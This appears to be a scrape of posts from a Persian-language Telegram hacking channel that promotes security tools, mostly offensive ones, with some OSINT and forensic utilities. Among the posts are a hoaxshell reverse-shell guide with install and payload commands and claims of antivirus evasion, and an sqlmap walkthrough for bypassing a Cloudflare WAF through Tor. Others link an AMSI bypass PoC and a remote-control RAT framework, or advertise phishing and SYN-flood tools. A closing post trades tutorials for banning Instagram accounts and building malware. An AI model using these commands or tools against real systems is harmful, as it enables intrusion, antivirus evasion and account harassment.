ریکشن بزن حمایت کنید اسکیریپت ابزار بهتر قوی تر میزارم
#NULL🖤
https://t.me/Kali_Linux_NULL

Certina is an OSINT tool for red teamers and bug hunters to discover subdomains from web certificate data

https://github.com/n0mi1k/certina

#NULL🖤
https://t.me/Kali_Linux_NULL

Dark-Hydro es una herramienta de OSINT creada en Python con el objetivo de recopilar información sobre un número de teléfono utilizando APIs públicas y técnicas de Google Dorking.
Con Dark-Hydro es pobible obtener:
* Codigo del pais
* Nombre del pais
* Ubicacion del numero de telefono (Ciudad)
* Transportador
* Latitud y Longitud
* Búsquedas de dorking archivos pdf, redes sociales, paginas web, donde el numero telefónico ha sido encontrado

Configuracion
Antes de utilizarlo, es necesario configurar algunas claves API, entre las API:
* Numverify
* Opencage
* Abstract API
* VeriPhone
Una vez obtenida nuestra clave API, es necesario colocar cada una en orden en el archivo config.json de la siguiente forma:
{
“OpencageKey”: “ReemplazarPorApikeyOpencage”,
“Numverifykey”: “ReemplazarPorApikeyNumverify”,
“Abstract”: “ReemplazarPorApikeyAbstract”,
“VeriPhone”: “ReemplazarPorApikeyVeriPhone”
}

https://github.com/Euronymou5/Dark-Hydro

#NULL🖤
https://t.me/Kali_Linux_NULL

CHOMTE.SH is a powerful shell script designed to automate reconnaissance tasks during penetration testing. It utilizes various Go-based tools to gather information and identify the attack surface, making it a valuable asset for bug bounty hunters and penetration testers.

https://github.com/mr-rizwan-syed/chomtesh

#NULL🖤
https://t.me/Kali_Linux_NULL

PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords, API keys, and secrets. Using regular expressions, it helps prevent accidental exposure of sensitive information in your command history.

https://github.com/aydinnyunus/PassDetective

#NULL🖤
https://t.me/Kali_Linux_NULL

A forensic tool to make analysis of email headers easy to aid in the quick discovery of the attacker.

mailMeta is a python based forensic tool which reads through the email headers from the email file and extracts crucial information to identify if the email is legitimate.

What are the advantages of using mailMeta?
Have you ever heared of email hacking or sophisticated email crimes where a spoofed email is sent to the victim and the victim trusts this email based on the email address which is infact fake. These email contains mallicious links which can be used to extract some information or install some malware or backdoors on your device. So, in order to avoid you from this mailMeta comes to your rescue.

Here I have added instructions on how to download the email from the file and then pass it to the mailMeta executable. It then parses the headers and informs you if the mail is genuine or not. Whenever you are suspicious about an email be sure to check it once here. It can save you in most of the scenarios. If anyone has some ideas/updates feel free to open an issue or create a pull request.

What are the information revealed by the mailMeta? mailMeta parses the following headers:

Message-ID
SPF-Record
DKIM-Record
DMARC-Record
Spoofed Email detection based on the above headers
IP-Address of the sender
Service Provider used for sending the email
Content-Type
Data and Time

https://github.com/gr33nm0nk2802/mailMeta

#NULL🖤
https://t.me/Kali_Linux_NULL

سورس برای خاموش کردن ویندوز تارگت از راه دور
#NULL🖤
https://t.me/Kali_Linux_NULL

کد: DAPPS

D: -•• (نقطه خط تیره)
A: •- (خط تیره)
P: •--• (نقطه خط تیره)
P: •--• (نقطه خط تیره)
#NULL🖤
https://t.me/Kali_Linux_NULL

ابزار گرفتن api hash, api id اکانت تلگرام

با این ابزار به سادگی api های اکانتتون رو بگیرید!

اگه براتون ارور اپدیت داد، باید حمایت کنید تا نسخه جدید برای ساخت api رو هم اضافه کنم

بدرود:)


Git:  https://github.com/esfelurm/Apis-Telegram

#NULL🖤
https://t.me/Kali_Linux_NULL

نحوه بای پس WAF با sqlmap

اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.

شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین می‌توانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.

برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید

sudo apt install privoxy -y 
sudo /etc/init.d/privoxy start

در نهایت حمله را شروع کنید!

python sqlmap.py -u "https://www.target.com/" --identify-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor

#Sqlmap


#NULL🖤
https://t.me/Kali_Linux_NULL

بررسی آسیب‌پذیری‌های بازنشانی رمز عبور

[View]

حتما بخونید
#NULL🖤
https://t.me/Kali_Linux_NULL

آسیب پذیری های Web Cache با توجه به معماری های جدید نرم‌افزاری میتونن برای یک کسب‌و‌کار کاملا خطرناک باشن، مثلا Paypal برای آسیب پذیری DoS از این طریق 9700$ بانتی داده
اسکنر زیر میتونه گزینه خوبی جهت آزمایش این نوع از آسیب پذیری ها باشه

https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner

#NULL🖤
https://t.me/Kali_Linux_NULL

آسیب پذیری که منجر به AMSI BYPASS می شود

حالا اصلا AMSI چیه؟

معرفی آسیب‌پذیری AMSI
رابط اسکن ضد بدافزار مایکروسافت (AMSI) که در ویندوز 10 و نسخه های بعدی ویندوز موجود است، برای کمک به شناسایی و جلوگیری از بدافزار طراحی شده است. AMSI رابطی است که برنامه‌های امنیتی مختلف (مانند نرم‌افزارهای آنتی ویروس یا ضد بدافزار) را در برنامه‌ها و نرم‌افزارها ادغام می‌کند و رفتار آنها را قبل از اجرا بررسی می‌کند. مربی فنی OffSec، Victor "Vixx" Khoury یک ورودی قابل نوشتن در System.Management.Automation.dll کشف کرد  که حاوی آدرس AmsiScanBuffer ، یک جزء مهم AMSI است که باید فقط خواندنی علامت گذاری می شد، شبیه به جدول آدرس واردات (IAT) ورودی های. در این پست وبلاگ، این آسیب‌پذیری را تشریح می‌کنیم و نشان می‌دهیم که چگونه Vixx از آن در یک دور زدن AMSI 0 روزه استفاده کرده است. این آسیب‌پذیری در ۸ آوریل ۲۰۲۴ به مایکروسافت گزارش شد.


اطلاعات کامل - https://www.offsec.com/offsec/amsi-write-raid-0day-vulnerability/

POC - https://github.com/V-i-x-x/AMSI-BYPASS

#NULL🖤
https://t.me/Kali_Linux_NULL

ابزار Hoaxshell 🕷
با استفاده از این ابزار میتونید خیلی راحت پیلود reverse shell بسازید یا به عبارتی دیگر با استفاده از پیلود ساخته شده با این ابزار میتونید دسترسی شل از سیستم بگیرید !💀
➖➖➖➖➖➖➖➖➖
این ابزار قادر به ساخت پیلودی است که به راحتی با آنتی ویروس ها شناسایی نمیشه !🕷️
🟡خب بریم برای نصب : 💥
🐱 git clone https://github.com/t3l3machus/hoaxshell

cd ./hoaxshell

sudo pip3 install -r requirements.txt

chmod +x hoaxshell.py

بعد نصب برای ساخت پیلود دستور زیرو بزنید 💀

sudo python3 hoaxshell.py -s <your_ip>

➖➖➖➖➖➖➖➖➖
بعد توی خروجی شما با یه کد مواجه میشید اون اصل کاری هستش  و باید توی  PowerShell یا CMD سیستم مورد نظر وارد کنید !⚡

⚡رفقا به این پست ریکشن بزنید.
😈 فردا میریم برای ریکورد و حمله خارج از شبکه با استفاده از
این پیلود reverse shell  🟦

ببینم چه میکنید .☠️

📱 #NULL🖤
https://t.me/Kali_Linux_NULL🖱

🔤🔤🔤🔤🔤🔤   🔤🔤🔤🔤

Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password

https://github.com/davenisc/thief_raccoon

#NULL🖤
https://t.me/Kali_Linux_NULLls

Insanity-Framework

Generate Payloads and Control Remote Machines. [Discontinued]

📌Features

Bypass most AV and Sandboxes.
Remote Control.
Payload Generation.
Some Phishing methods are included on payloads generated.
Detect Virtual Machines.
Multiple Session disabled.
Persistence and others features can be enabled.
Bypass UAC.
Memory Injection.

📌Needed dependencies

apt
wine
wget
Linux
sudo access
python2.7
python 2.7 on Wine Machine
pywin32 on Wine Machine
VCForPython27 on Wine Machine

📌Tested on

Kali Linux - SANA
Kali Linux - ROLLING
Ubuntu 14.04-16.04 LTS
Debian 8.5
Linux Mint 18.1
Black Arch Linux

More Info
  https://github.com/4w4k3/Insanity-Framework

#NULL🖤
https://t.me/Kali_Linux_NULL

WhoseHere 🤨

OSINT, Pentesting and Property Investor Tool for gathering in-depth information about post codes. Shows significant information such as individual house tax bands, Exact to number residence in the area with exact numbers of ethnicity and religion, Crime in the area, Credit card acceptance, Income, House prices etc. Contains a lot of codes such as: admin district, ccg, ced, nuts, parliamentary constituency etc.

https://github.com/peel1/WhoseHere


#NULL🖤
https://t.me/Kali_Linux_NULL

Poison 💀☠️

Poison is a script capable of scanning hosts, performing MAC spoofing, executing SYN flood attacks, and sniffing FTP.

https://github.com/R3LI4NT/Poison

#NULL🖤
https://t.me/Kali_Linux_NULL

بن کردن پیچ اینستاگرام و بالا اورن ساپرتش کامل معاوضه میکنم بجاشبا پکیچ فول فلیترینگ که شامل
👇نکته تمام اینا رو فیلم اموزش داده شده🖤
1 آموزش ساخت ترجمه های حساس کننده
2اموزش ساخت دی اسکیریپت فعال
3 آموزش ساخت کد سرور
4 آموزش ساخت کد سرور حساس کنند اکانت
5  اموزش گرفتن مخرب از سایت های دارک وب برای اکانت
6 اموزش گرفتن مخرب از سایت های شیطانی برای حساس کنند اکانت
7 آموزش ساخت الگوریتم دستی برای کد
8 آموزش ساخت الگوریتم از سایت دارک وب برای کد
9 آموزش ورود به سایت های دارک
10 آموزش اپ کردن باگ های قدمی کد
11 آموزش اپ کردن روش های کد
12 آموزش ساخت الگوریتم از سایت پ.ون برای کد
13 آموزش ساخت مخرب گرفتن از سایت پ.رن
14 آموزش ساخت ویروس مخرب قویر برای کد
15 آموزش مخلوط کردن کد
16 آموزش پروف طرف تخلاف کردن
17آموزش حساس کنند اکانت
18 آموزش حساس کنند چنل
19‌آموزش حساس کنند گپ
20 آموزش فیلتر کردن اکانت شاد
برای معاوضه به پیو بنده پیام بدهین

@RIPVRT

#NULL🖤
https://t.me/Kali_Linux_NULL